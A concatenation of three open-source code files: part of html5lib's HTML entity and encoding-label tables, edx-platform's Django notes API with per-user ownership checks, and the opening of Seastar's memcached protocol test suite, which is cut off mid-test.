"subseteq;": "\u2286",
"subseteqq;": "\u2ac5",
"subsetneq;": "\u228a",
"subsetneqq;": "\u2acb",
"subsim;": "\u2ac7",
"subsub;": "\u2ad5",
"subsup;": "\u2ad3",
"succ;": "\u227b",
"succapprox;": "\u2ab8",
"succcurlyeq;": "\u227d",
"succeq;": "\u2ab0",
"succnapprox;": "\u2aba",
"succneqq;": "\u2ab6",
"succnsim;": "\u22e9",
"succsim;": "\u227f",
"sum;": "\u2211",
"sung;": "\u266a",
"sup1": "\xb9",
"sup1;": "\xb9",
"sup2": "\xb2",
"sup2;": "\xb2",
"sup3": "\xb3",
"sup3;": "\xb3",
"sup;": "\u2283",
"supE;": "\u2ac6",
"supdot;": "\u2abe",
"supdsub;": "\u2ad8",
"supe;": "\u2287",
"supedot;": "\u2ac4",
"suphsol;": "\u27c9",
"suphsub;": "\u2ad7",
"suplarr;": "\u297b",
"supmult;": "\u2ac2",
"supnE;": "\u2acc",
"supne;": "\u228b",
"supplus;": "\u2ac0",
"supset;": "\u2283",
"supseteq;": "\u2287",
"supseteqq;": "\u2ac6",
"supsetneq;": "\u228b",
"supsetneqq;": "\u2acc",
"supsim;": "\u2ac8",
"supsub;": "\u2ad4",
"supsup;": "\u2ad6",
"swArr;": "\u21d9",
"swarhk;": "\u2926",
"swarr;": "\u2199",
"swarrow;": "\u2199",
"swnwar;": "\u292a",
"szlig": "\xdf",
"szlig;": "\xdf",
"target;": "\u2316",
"tau;": "\u03c4",
"tbrk;": "\u23b4",
"tcaron;": "\u0165",
"tcedil;": "\u0163",
"tcy;": "\u0442",
"tdot;": "\u20db",
"telrec;": "\u2315",
"tfr;": "\U0001d531",
"there4;": "\u2234",
"therefore;": "\u2234",
"theta;": "\u03b8",
"thetasym;": "\u03d1",
"thetav;": "\u03d1",
"thickapprox;": "\u2248",
"thicksim;": "\u223c",
"thinsp;": "\u2009",
"thkap;": "\u2248",
"thksim;": "\u223c",
"thorn": "\xfe",
"thorn;": "\xfe",
"tilde;": "\u02dc",
"times": "\xd7",
"times;": "\xd7",
"timesb;": "\u22a0",
"timesbar;": "\u2a31",
"timesd;": "\u2a30",
"tint;": "\u222d",
"toea;": "\u2928",
"top;": "\u22a4",
"topbot;": "\u2336",
"topcir;": "\u2af1",
"topf;": "\U0001d565",
"topfork;": "\u2ada",
"tosa;": "\u2929",
"tprime;": "\u2034",
"trade;": "\u2122",
"triangle;": "\u25b5",
"triangledown;": "\u25bf",
"triangleleft;": "\u25c3",
"trianglelefteq;": "\u22b4",
"triangleq;": "\u225c",
"triangleright;": "\u25b9",
"trianglerighteq;": "\u22b5",
"tridot;": "\u25ec",
"trie;": "\u225c",
"triminus;": "\u2a3a",
"triplus;": "\u2a39",
"trisb;": "\u29cd",
"tritime;": "\u2a3b",
"trpezium;": "\u23e2",
"tscr;": "\U0001d4c9",
"tscy;": "\u0446",
"tshcy;": "\u045b",
"tstrok;": "\u0167",
"twixt;": "\u226c",
"twoheadleftarrow;": "\u219e",
"twoheadrightarrow;": "\u21a0",
"uArr;": "\u21d1",
"uHar;": "\u2963",
"uacute": "\xfa",
"uacute;": "\xfa",
"uarr;": "\u2191",
"ubrcy;": "\u045e",
"ubreve;": "\u016d",
"ucirc": "\xfb",
"ucirc;": "\xfb",
"ucy;": "\u0443",
"udarr;": "\u21c5",
"udblac;": "\u0171",
"udhar;": "\u296e",
"ufisht;": "\u297e",
"ufr;": "\U0001d532",
"ugrave": "\xf9",
"ugrave;": "\xf9",
"uharl;": "\u21bf",
"uharr;": "\u21be",
"uhblk;": "\u2580",
"ulcorn;": "\u231c",
"ulcorner;": "\u231c",
"ulcrop;": "\u230f",
"ultri;": "\u25f8",
"umacr;": "\u016b",
"uml": "\xa8",
"uml;": "\xa8",
"uogon;": "\u0173",
"uopf;": "\U0001d566",
"uparrow;": "\u2191",
"updownarrow;": "\u2195",
"upharpoonleft;": "\u21bf",
"upharpoonright;": "\u21be",
"uplus;": "\u228e",
"upsi;": "\u03c5",
"upsih;": "\u03d2",
"upsilon;": "\u03c5",
"upuparrows;": "\u21c8",
"urcorn;": "\u231d",
"urcorner;": "\u231d",
"urcrop;": "\u230e",
"uring;": "\u016f",
"urtri;": "\u25f9",
"uscr;": "\U0001d4ca",
"utdot;": "\u22f0",
"utilde;": "\u0169",
"utri;": "\u25b5",
"utrif;": "\u25b4",
"uuarr;": "\u21c8",
"uuml": "\xfc",
"uuml;": "\xfc",
"uwangle;": "\u29a7",
"vArr;": "\u21d5",
"vBar;": "\u2ae8",
"vBarv;": "\u2ae9",
"vDash;": "\u22a8",
"vangrt;": "\u299c",
"varepsilon;": "\u03f5",
"varkappa;": "\u03f0",
"varnothing;": "\u2205",
"varphi;": "\u03d5",
"varpi;": "\u03d6",
"varpropto;": "\u221d",
"varr;": "\u2195",
"varrho;": "\u03f1",
"varsigma;": "\u03c2",
"varsubsetneq;": "\u228a\ufe00",
"varsubsetneqq;": "\u2acb\ufe00",
"varsupsetneq;": "\u228b\ufe00",
"varsupsetneqq;": "\u2acc\ufe00",
"vartheta;": "\u03d1",
"vartriangleleft;": "\u22b2",
"vartriangleright;": "\u22b3",
"vcy;": "\u0432",
"vdash;": "\u22a2",
"vee;": "\u2228",
"veebar;": "\u22bb",
"veeeq;": "\u225a",
"vellip;": "\u22ee",
"verbar;": "|",
"vert;": "|",
"vfr;": "\U0001d533",
"vltri;": "\u22b2",
"vnsub;": "\u2282\u20d2",
"vnsup;": "\u2283\u20d2",
"vopf;": "\U0001d567",
"vprop;": "\u221d",
"vrtri;": "\u22b3",
"vscr;": "\U0001d4cb",
"vsubnE;": "\u2acb\ufe00",
"vsubne;": "\u228a\ufe00",
"vsupnE;": "\u2acc\ufe00",
"vsupne;": "\u228b\ufe00",
"vzigzag;": "\u299a",
"wcirc;": "\u0175",
"wedbar;": "\u2a5f",
"wedge;": "\u2227",
"wedgeq;": "\u2259",
"weierp;": "\u2118",
"wfr;": "\U0001d534",
"wopf;": "\U0001d568",
"wp;": "\u2118",
"wr;": "\u2240",
"wreath;": "\u2240",
"wscr;": "\U0001d4cc",
"xcap;": "\u22c2",
"xcirc;": "\u25ef",
"xcup;": "\u22c3",
"xdtri;": "\u25bd",
"xfr;": "\U0001d535",
"xhArr;": "\u27fa",
"xharr;": "\u27f7",
"xi;": "\u03be",
"xlArr;": "\u27f8",
"xlarr;": "\u27f5",
"xmap;": "\u27fc",
"xnis;": "\u22fb",
"xodot;": "\u2a00",
"xopf;": "\U0001d569",
"xoplus;": "\u2a01",
"xotime;": "\u2a02",
"xrArr;": "\u27f9",
"xrarr;": "\u27f6",
"xscr;": "\U0001d4cd",
"xsqcup;": "\u2a06",
"xuplus;": "\u2a04",
"xutri;": "\u25b3",
"xvee;": "\u22c1",
"xwedge;": "\u22c0",
"yacute": "\xfd",
"yacute;": "\xfd",
"yacy;": "\u044f",
"ycirc;": "\u0177",
"ycy;": "\u044b",
"yen": "\xa5",
"yen;": "\xa5",
"yfr;": "\U0001d536",
"yicy;": "\u0457",
"yopf;": "\U0001d56a",
"yscr;": "\U0001d4ce",
"yucy;": "\u044e",
"yuml": "\xff",
"yuml;": "\xff",
"zacute;": "\u017a",
"zcaron;": "\u017e",
"zcy;": "\u0437",
"zdot;": "\u017c",
"zeetrf;": "\u2128",
"zeta;": "\u03b6",
"zfr;": "\U0001d537",
"zhcy;": "\u0436",
"zigrarr;": "\u21dd",
"zopf;": "\U0001d56b",
"zscr;": "\U0001d4cf",
"zwj;": "\u200d",
"zwnj;": "\u200c",
}
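# Note: the HTML5 spec also recognizes a fixed list of legacy named references
# without the trailing semicolon, which is why many names above appear twice
# (e.g. "amp" and "amp;"). Names outside that legacy list are defined only
# with the semicolon. Illustrative lookups against the table above:
#
#     entities["amp;"]     # -> "&"
#     entities["amp"]      # -> "&"  (legacy form, no semicolon)
#     entities["Abreve;"]  # -> "\u0102"; there is no "Abreve" key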
replacementCharacters = {
0x0: "\uFFFD",
0x0d: "\u000D",
0x80: "\u20AC",
    0x81: "\u0081",
0x82: "\u201A",
0x83: "\u0192",
0x84: "\u201E",
0x85: "\u2026",
0x86: "\u2020",
0x87: "\u2021",
0x88: "\u02C6",
0x89: "\u2030",
0x8A: "\u0160",
0x8B: "\u2039",
0x8C: "\u0152",
0x8D: "\u008D",
0x8E: "\u017D",
0x8F: "\u008F",
0x90: "\u0090",
0x91: "\u2018",
0x92: "\u2019",
0x93: "\u201C",
0x94: "\u201D",
0x95: "\u2022",
0x96: "\u2013",
0x97: "\u2014",
0x98: "\u02DC",
0x99: "\u2122",
0x9A: "\u0161",
0x9B: "\u203A",
0x9C: "\u0153",
0x9D: "\u009D",
0x9E: "\u017E",
0x9F: "\u0178",
}
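# This table implements the HTML5 fixup for numeric character references:
# code points 0x00, 0x0D and the 0x80-0x9F range are remapped, mostly to the
# windows-1252 repertoire (the same mapping as the tuple of code points
# above). For example, parsing "&#x93;" should yield
# replacementCharacters[0x93] == "\u201C" (left double quotation mark).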
encodings = {
'437': 'cp437',
'850': 'cp850',
'852': 'cp852',
'855': 'cp855',
'857': 'cp857',
'860': 'cp860',
'861': 'cp861',
'862': 'cp862',
'863': 'cp863',
'865': 'cp865',
'866': 'cp866',
'869': 'cp869',
'ansix341968': 'ascii',
'ansix341986': 'ascii',
'arabic': 'iso8859-6',
'ascii': 'ascii',
'asmo708': 'iso8859-6',
'big5': 'big5',
'big5hkscs': 'big5hkscs',
'chinese': 'gbk',
'cp037': 'cp037',
'cp1026': 'cp1026',
'cp154': 'ptcp154',
'cp367': 'ascii',
'cp424': 'cp424',
'cp437': 'cp437',
'cp500': 'cp500',
'cp775': 'cp775',
'cp819': 'windows-1252',
'cp850': 'cp850',
'cp852': 'cp852',
'cp855': 'cp855',
'cp857': 'cp857',
'cp860': 'cp860',
'cp861': 'cp861',
'cp862': 'cp862',
'cp863': 'cp863',
'cp864': 'cp864',
'cp865': 'cp865',
'cp866': 'cp866',
'cp869': 'cp869',
'cp936': 'gbk',
'cpgr': 'cp869',
'cpis': 'cp861',
'csascii': 'ascii',
'csbig5': 'big5',
'cseuckr': 'cp949',
'cseucpkdfmtjapanese': 'euc_jp',
'csgb2312': 'gbk',
'cshproman8': 'hp-roman8',
'csibm037': 'cp037',
'csibm1026': 'cp1026',
'csibm424': 'cp424',
'csibm500': 'cp500',
'csibm855': 'cp855',
'csibm857': 'cp857',
'csibm860': 'cp860',
'csibm861': 'cp861',
'csibm863': 'cp863',
'csibm864': 'cp864',
'csibm865': 'cp865',
'csibm866': 'cp866',
'csibm869': 'cp869',
'csiso2022jp': 'iso2022_jp',
'csiso2022jp2': 'iso2022_jp_2',
'csiso2022kr': 'iso2022_kr',
'csiso58gb231280': 'gbk',
'csisolatin1': 'windows-1252',
'csisolatin2': 'iso8859-2',
'csisolatin3': 'iso8859-3',
'csisolatin4': 'iso8859-4',
'csisolatin5': 'windows-1254',
'csisolatin6': 'iso8859-10',
'csisolatinarabic': 'iso8859-6',
'csisolatincyrillic': 'iso8859-5',
'csisolatingreek': 'iso8859-7',
'csisolatinhebrew': 'iso8859-8',
'cskoi8r': 'koi8-r',
'csksc56011987': 'cp949',
'cspc775baltic': 'cp775',
'cspc850multilingual': 'cp850',
'cspc862latinhebrew': 'cp862',
'cspc8codepage437': 'cp437',
'cspcp852': 'cp852',
'csptcp154': 'ptcp154',
'csshiftjis': 'shift_jis',
'csunicode11utf7': 'utf-7',
'cyrillic': 'iso8859-5',
'cyrillicasian': 'ptcp154',
'ebcdiccpbe': 'cp500',
'ebcdiccpca': 'cp037',
'ebcdiccpch': 'cp500',
'ebcdiccphe': 'cp424',
'ebcdiccpnl': 'cp037',
'ebcdiccpus': 'cp037',
'ebcdiccpwt': 'cp037',
'ecma114': 'iso8859-6',
'ecma118': 'iso8859-7',
'elot928': 'iso8859-7',
'eucjp': 'euc_jp',
'euckr': 'cp949',
'extendedunixcodepackedformatforjapanese': 'euc_jp',
'gb18030': 'gb18030',
'gb2312': 'gbk',
'gb231280': 'gbk',
'gbk': 'gbk',
'greek': 'iso8859-7',
'greek8': 'iso8859-7',
'hebrew': 'iso8859-8',
'hproman8': 'hp-roman8',
'hzgb2312': 'hz',
'ibm037': 'cp037',
'ibm1026': 'cp1026',
'ibm367': 'ascii',
'ibm424': 'cp424',
'ibm437': 'cp437',
'ibm500': 'cp500',
'ibm775': 'cp775',
'ibm819': 'windows-1252',
'ibm850': 'cp850',
'ibm852': 'cp852',
'ibm855': 'cp855',
'ibm857': 'cp857',
'ibm860': 'cp860',
'ibm861': 'cp861',
'ibm862': 'cp862',
'ibm863': 'cp863',
'ibm864': 'cp864',
'ibm865': 'cp865',
'ibm866': 'cp866',
'ibm869': 'cp869',
'iso2022jp': 'iso2022_jp',
'iso2022jp2': 'iso2022_jp_2',
'iso2022kr': 'iso2022_kr',
'iso646irv1991': 'ascii',
'iso646us': 'ascii',
'iso88591': 'windows-1252',
'iso885910': 'iso8859-10',
'iso8859101992': 'iso8859-10',
'iso885911987': 'windows-1252',
'iso885913': 'iso8859-13',
'iso885914': 'iso8859-14',
'iso8859141998': 'iso8859-14',
'iso885915': 'iso8859-15',
'iso885916': 'iso8859-16',
'iso8859162001': 'iso8859-16',
'iso88592': 'iso8859-2',
'iso885921987': 'iso8859-2',
'iso88593': 'iso8859-3',
'iso885931988': 'iso8859-3',
'iso88594': 'iso8859-4',
'iso885941988': 'iso8859-4',
'iso88595': 'iso8859-5',
'iso885951988': 'iso8859-5',
'iso88596': 'iso8859-6',
'iso885961987': 'iso8859-6',
'iso88597': 'iso8859-7',
'iso885971987': 'iso8859-7',
'iso88598': 'iso8859-8',
'iso885981988': 'iso8859-8',
'iso88599': 'windows-1254',
'iso885991989': 'windows-1254',
'isoceltic': 'iso8859-14',
'isoir100': 'windows-1252',
'isoir101': 'iso8859-2',
'isoir109': 'iso8859-3',
'isoir110': 'iso8859-4',
'isoir126': 'iso8859-7',
'isoir127': 'iso8859-6',
'isoir138': 'iso8859-8',
'isoir144': 'iso8859-5',
'isoir148': 'windows-1254',
'isoir149': 'cp949',
'isoir157': 'iso8859-10',
'isoir199': 'iso8859-14',
'isoir226': 'iso8859-16',
'isoir58': 'gbk',
'isoir6': 'ascii',
'koi8r': 'koi8-r',
'koi8u': 'koi8-u',
'korean': 'cp949',
'ksc5601': 'cp949',
'ksc56011987': 'cp949',
'ksc56011989': 'cp949',
'l1': 'windows-1252',
'l10': 'iso8859-16',
'l2': 'iso8859-2',
'l3': 'iso8859-3',
'l4': 'iso8859-4',
'l5': 'windows-1254',
'l6': 'iso8859-10',
'l8': 'iso8859-14',
'latin1': 'windows-1252',
'latin10': 'iso8859-16',
'latin2': 'iso8859-2',
'latin3': 'iso8859-3',
'latin4': 'iso8859-4',
'latin5': 'windows-1254',
'latin6': 'iso8859-10',
'latin8': 'iso8859-14',
'latin9': 'iso8859-15',
'ms936': 'gbk',
'mskanji': 'shift_jis',
'pt154': 'ptcp154',
'ptcp154': 'ptcp154',
'r8': 'hp-roman8',
'roman8': 'hp-roman8',
'shiftjis': 'shift_jis',
'tis620': 'cp874',
'unicode11utf7': 'utf-7',
'us': 'ascii',
'usascii': 'ascii',
'utf16': 'utf-16',
'utf16be': 'utf-16-be',
'utf16le': 'utf-16-le',
'utf8': 'utf-8',
'windows1250': 'cp1250',
'windows1251': 'cp1251',
'windows1252': 'cp1252',
'windows1253': 'cp1253',
'windows1254': 'cp1254',
'windows1255': 'cp1255',
'windows1256': 'cp1256',
'windows1257': 'cp1257',
'windows1258': 'cp1258',
'windows936': 'gbk',
'x-x-big5': 'big5'}
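# The keys above are encoding labels reduced to lowercase alphanumerics, so a
# caller is expected to normalize user-supplied labels the same way before
# lookup. A minimal sketch of such a lookup (the normalization helper is an
# assumption for illustration, not part of this module):
#
#     import re
#
#     def lookup_codec(label):
#         key = re.sub(r"[^a-z0-9]", "", label.lower())
#         return encodings.get(key)
#
#     lookup_codec("ISO-8859-1")  # -> "windows-1252", per the table above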
tokenTypes = {
"Doctype": 0,
"Characters": 1,
"SpaceCharacters": 2,
"StartTag": 3,
"EndTag": 4,
"EmptyTag": 5,
"Comment": 6,
"ParseError": 7
}
tagTokenTypes = frozenset((tokenTypes["StartTag"], tokenTypes["EndTag"],
tokenTypes["EmptyTag"]))
prefixes = {v: k for k, v in namespaces.items()}
prefixes["http://www.w3.org/1998/Math/MathML"] = "math"
class DataLossWarning(UserWarning):
pass
class ReparseException(Exception):
pass
| gpl-3.0 |
cselis86/edx-platform | lms/djangoapps/notes/api.py | 165 | 7855 | from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, Http404
from django.core.exceptions import ValidationError
from notes.models import Note
from notes.utils import notes_enabled_for_course
from courseware.courses import get_course_with_access
import json
import logging
import collections
log = logging.getLogger(__name__)
API_SETTINGS = {
'META': {'name': 'Notes API', 'version': 1},
# Maps resources to HTTP methods and actions
'RESOURCE_MAP': {
'root': {'GET': 'root'},
'notes': {'GET': 'index', 'POST': 'create'},
'note': {'GET': 'read', 'PUT': 'update', 'DELETE': 'delete'},
'search': {'GET': 'search'},
},
# Cap the number of notes that can be returned in one request
'MAX_NOTE_LIMIT': 1000,
}
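# For example, a GET on the "notes" resource resolves through
# RESOURCE_MAP['notes']['GET'] to the name 'index', and api_request() below
# then dispatches to the module-level function of that name via globals().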
# Wrapper class for HTTP response and data. All API actions are expected to return this.
ApiResponse = collections.namedtuple('ApiResponse', ['http_response', 'data'])
#----------------------------------------------------------------------#
# API requests are routed through api_request() using the resource map.
def api_enabled(request, course_key):
'''
    Returns True if the API is enabled for the course, otherwise False.
'''
course = _get_course(request, course_key)
return notes_enabled_for_course(course)
@login_required
def api_request(request, course_id, **kwargs):
'''
Routes API requests to the appropriate action method and returns JSON.
Raises a 404 if the requested resource does not exist or notes are
disabled for the course.
'''
assert isinstance(course_id, basestring)
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# Verify that the api should be accessible to this course
if not api_enabled(request, course_key):
log.debug('Notes are disabled for course: {0}'.format(course_id))
raise Http404
# Locate the requested resource
resource_map = API_SETTINGS.get('RESOURCE_MAP', {})
resource_name = kwargs.pop('resource')
resource_method = request.method
resource = resource_map.get(resource_name)
if resource is None:
log.debug('Resource "{0}" does not exist'.format(resource_name))
raise Http404
if resource_method not in resource.keys():
log.debug('Resource "{0}" does not support method "{1}"'.format(resource_name, resource_method))
raise Http404
# Execute the action associated with the resource
func = resource.get(resource_method)
module = globals()
if func not in module:
log.debug('Function "{0}" does not exist for request {1} {2}'.format(func, resource_method, resource_name))
raise Http404
log.debug('API request: {0} {1}'.format(resource_method, resource_name))
api_response = module[func](request, course_key, **kwargs)
http_response = api_format(api_response)
return http_response
def api_format(api_response):
'''
Takes an ApiResponse and returns an HttpResponse.
'''
http_response = api_response.http_response
content_type = 'application/json'
content = ''
    # not doing a strict boolean check on data because it could be an empty list
if api_response.data is not None and api_response.data != '':
content = json.dumps(api_response.data)
http_response['Content-type'] = content_type
http_response.content = content
log.debug('API response type: {0} content: {1}'.format(content_type, content))
return http_response
def _get_course(request, course_key):
'''
Helper function to load and return a user's course.
'''
return get_course_with_access(request.user, 'load', course_key)
#----------------------------------------------------------------------#
# API actions exposed via the resource map.
def index(request, course_key):
'''
Returns a list of annotation objects.
'''
MAX_LIMIT = API_SETTINGS.get('MAX_NOTE_LIMIT')
notes = Note.objects.order_by('id').filter(course_id=course_key,
user=request.user)[:MAX_LIMIT]
return ApiResponse(http_response=HttpResponse(), data=[note.as_dict() for note in notes])
def create(request, course_key):
'''
Receives an annotation object to create and returns a 303 with the read location.
'''
note = Note(course_id=course_key, user=request.user)
try:
note.clean(request.body)
except ValidationError as e:
log.debug(e)
return ApiResponse(http_response=HttpResponse('', status=400), data=None)
note.save()
response = HttpResponse('', status=303)
response['Location'] = note.get_absolute_url()
return ApiResponse(http_response=response, data=None)
def read(request, _course_key, note_id):
'''
Returns a single annotation object.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
return ApiResponse(http_response=HttpResponse(), data=note.as_dict())
def update(request, course_key, note_id): # pylint: disable=unused-argument
'''
Updates an annotation object and returns a 303 with the read location.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
try:
note.clean(request.body)
except ValidationError as e:
log.debug(e)
return ApiResponse(http_response=HttpResponse('', status=400), data=None)
note.save()
response = HttpResponse('', status=303)
response['Location'] = note.get_absolute_url()
return ApiResponse(http_response=response, data=None)
def delete(request, course_id, note_id):
'''
Deletes the annotation object and returns a 204 with no content.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
note.delete()
return ApiResponse(http_response=HttpResponse('', status=204), data=None)
def search(request, course_key):
'''
Returns a subset of annotation objects based on a search query.
'''
MAX_LIMIT = API_SETTINGS.get('MAX_NOTE_LIMIT')
# search parameters
offset = request.GET.get('offset', '')
limit = request.GET.get('limit', '')
uri = request.GET.get('uri', '')
# validate search parameters
if offset.isdigit():
offset = int(offset)
else:
offset = 0
if limit.isdigit():
limit = int(limit)
if limit == 0 or limit > MAX_LIMIT:
limit = MAX_LIMIT
else:
limit = MAX_LIMIT
# set filters
filters = {'course_id': course_key, 'user': request.user}
if uri != '':
filters['uri'] = uri
# retrieve notes
notes = Note.objects.order_by('id').filter(**filters)
total = notes.count()
rows = notes[offset:offset + limit]
result = {
'total': total,
'rows': [note.as_dict() for note in rows]
}
return ApiResponse(http_response=HttpResponse(), data=result)
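# Example exchange (illustrative URL and values): a request such as
# GET <search-endpoint>?uri=/chapter/1&offset=20&limit=10 answers with
# {'total': <count of matching notes>, 'rows': [<at most 10 notes from offset 20>]}.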
def root(request, course_key): # pylint: disable=unused-argument
'''
Returns version information about the API.
'''
return ApiResponse(http_response=HttpResponse(), data=API_SETTINGS.get('META'))
| agpl-3.0 |
shyamalschandra/seastar | tests/memcached/test_memcached.py | 25 | 22367 | #!/usr/bin/env python3
#
# This file is open source software, licensed to you under the terms
# of the Apache License, Version 2.0 (the "License"). See the NOTICE file
# distributed with this work for additional information regarding copyright
# ownership. You may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from contextlib import contextmanager
import socket
import struct
import sys
import random
import argparse
import time
import re
import unittest
server_addr = None
call = None
args = None
class TimeoutError(Exception):
pass
@contextmanager
def tcp_connection(timeout=1):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(server_addr)
def call(msg):
s.send(msg.encode())
return s.recv(16*1024)
yield call
s.close()
def slow(f):
def wrapper(self):
if args.fast:
raise unittest.SkipTest('Slow')
return f(self)
return wrapper
def recv_all(s):
m = b''
while True:
data = s.recv(1024)
if not data:
break
m += data
return m
def tcp_call(msg, timeout=1):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(server_addr)
s.send(msg.encode())
s.shutdown(socket.SHUT_WR)
data = recv_all(s)
s.close()
return data
def udp_call_for_fragments(msg, timeout=1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(timeout)
this_req_id = random.randint(-32768, 32767)
datagram = struct.pack(">hhhh", this_req_id, 0, 1, 0) + msg.encode()
sock.sendto(datagram, server_addr)
messages = {}
n_determined = None
while True:
data, addr = sock.recvfrom(1500)
req_id, seq, n, res = struct.unpack_from(">hhhh", data)
content = data[8:]
if n_determined and n_determined != n:
raise Exception('Inconsistent number of total messages, %d and %d' % (n_determined, n))
n_determined = n
if req_id != this_req_id:
raise Exception('Invalid request id: %d, expected %d' % (req_id, this_req_id))
if seq in messages:
raise Exception('Duplicate message for seq=%d' % seq)
messages[seq] = content
if len(messages) == n:
break
for k, v in sorted(messages.items(), key=lambda e: e[0]):
yield v
sock.close()
def udp_call(msg, **kwargs):
return b''.join(udp_call_for_fragments(msg, **kwargs))
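# The UDP frame header packed above is the memcached UDP protocol header:
# four big-endian signed 16-bit fields holding request id, sequence number,
# total datagram count, and a reserved word. For example, the single-fragment
# request with id 7 is:
#
#     struct.pack(">hhhh", 7, 0, 1, 0)  # -> b'\x00\x07\x00\x00\x00\x01\x00\x00'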
class MemcacheTest(unittest.TestCase):
def set(self, key, value, flags=0, expiry=0):
self.assertEqual(call('set %s %d %d %d\r\n%s\r\n' % (key, flags, expiry, len(value), value)), b'STORED\r\n')
def delete(self, key):
self.assertEqual(call('delete %s\r\n' % key), b'DELETED\r\n')
def assertHasKey(self, key):
resp = call('get %s\r\n' % key)
if not resp.startswith(('VALUE %s' % key).encode()):
self.fail('Key \'%s\' should be present, but got: %s' % (key, resp.decode()))
def assertNoKey(self, key):
resp = call('get %s\r\n' % key)
if resp != b'END\r\n':
self.fail('Key \'%s\' should not be present, but got: %s' % (key, resp.decode()))
def setKey(self, key):
self.set(key, 'some value')
def getItemVersion(self, key):
m = re.match(r'VALUE %s \d+ \d+ (?P<version>\d+)' % key, call('gets %s\r\n' % key).decode())
return int(m.group('version'))
def getStat(self, name, call_fn=None):
if not call_fn: call_fn = call
resp = call_fn('stats\r\n').decode()
m = re.search(r'STAT %s (?P<value>.+)' % re.escape(name), resp, re.MULTILINE)
return m.group('value')
def flush(self):
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
def tearDown(self):
self.flush()
class TcpSpecificTests(MemcacheTest):
def test_recovers_from_errors_in_the_stream(self):
with tcp_connection() as conn:
self.assertEqual(conn('get\r\n'), b'ERROR\r\n')
self.assertEqual(conn('get key\r\n'), b'END\r\n')
def test_incomplete_command_results_in_error(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_addr)
s.send(b'get')
s.shutdown(socket.SHUT_WR)
self.assertEqual(recv_all(s), b'ERROR\r\n')
s.close()
def test_stream_closed_results_in_error(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_addr)
s.shutdown(socket.SHUT_WR)
self.assertEqual(recv_all(s), b'')
s.close()
def test_unsuccessful_parsing_does_not_leave_data_behind(self):
with tcp_connection() as conn:
self.assertEqual(conn('set key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
self.assertRegexpMatches(conn('delete a b c\r\n'), b'^(CLIENT_)?ERROR.*\r\n$')
self.assertEqual(conn('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(conn('delete key\r\n'), b'DELETED\r\n')
def test_flush_all_no_reply(self):
self.assertEqual(call('flush_all noreply\r\n'), b'')
def test_set_no_reply(self):
self.assertEqual(call('set key 0 0 5 noreply\r\nhello\r\nget key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.delete('key')
def test_delete_no_reply(self):
self.setKey('key')
self.assertEqual(call('delete key noreply\r\nget key\r\n'), b'END\r\n')
def test_add_no_reply(self):
self.assertEqual(call('add key 0 0 1 noreply\r\na\r\nget key\r\n'), b'VALUE key 0 1\r\na\r\nEND\r\n')
self.delete('key')
def test_replace_no_reply(self):
self.assertEqual(call('set key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('replace key 0 0 1 noreply\r\nb\r\nget key\r\n'), b'VALUE key 0 1\r\nb\r\nEND\r\n')
self.delete('key')
def test_cas_noreply(self):
self.assertNoKey('key')
self.assertEqual(call('cas key 0 0 1 1 noreply\r\na\r\n'), b'')
self.assertNoKey('key')
self.assertEqual(call('add key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
version = self.getItemVersion('key')
self.assertEqual(call('cas key 1 0 5 %d noreply\r\naloha\r\n' % (version + 1)), b'')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(call('cas key 1 0 5 %d noreply\r\naloha\r\n' % (version)), b'')
self.assertEqual(call('get key\r\n'), b'VALUE key 1 5\r\naloha\r\nEND\r\n')
self.delete('key')
@slow
def test_connection_statistics(self):
with tcp_connection() as conn:
curr_connections = int(self.getStat('curr_connections', call_fn=conn))
total_connections = int(self.getStat('total_connections', call_fn=conn))
with tcp_connection() as conn2:
self.assertEquals(curr_connections + 1, int(self.getStat('curr_connections', call_fn=conn)))
self.assertEquals(total_connections + 1, int(self.getStat('total_connections', call_fn=conn)))
self.assertEquals(total_connections + 1, int(self.getStat('total_connections', call_fn=conn)))
time.sleep(0.1)
self.assertEquals(curr_connections, int(self.getStat('curr_connections', call_fn=conn)))
class UdpSpecificTests(MemcacheTest):
def test_large_response_is_split_into_mtu_chunks(self):
max_datagram_size = 1400
data = '1' * (max_datagram_size*3)
self.set('key', data)
chunks = list(udp_call_for_fragments('get key\r\n'))
for chunk in chunks:
self.assertLessEqual(len(chunk), max_datagram_size)
self.assertEqual(b''.join(chunks).decode(),
'VALUE key 0 %d\r\n%s\r\n' \
'END\r\n' % (len(data), data))
self.delete('key')
class TestCommands(MemcacheTest):
def test_basic_commands(self):
self.assertEqual(call('get key\r\n'), b'END\r\n')
self.assertEqual(call('set key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
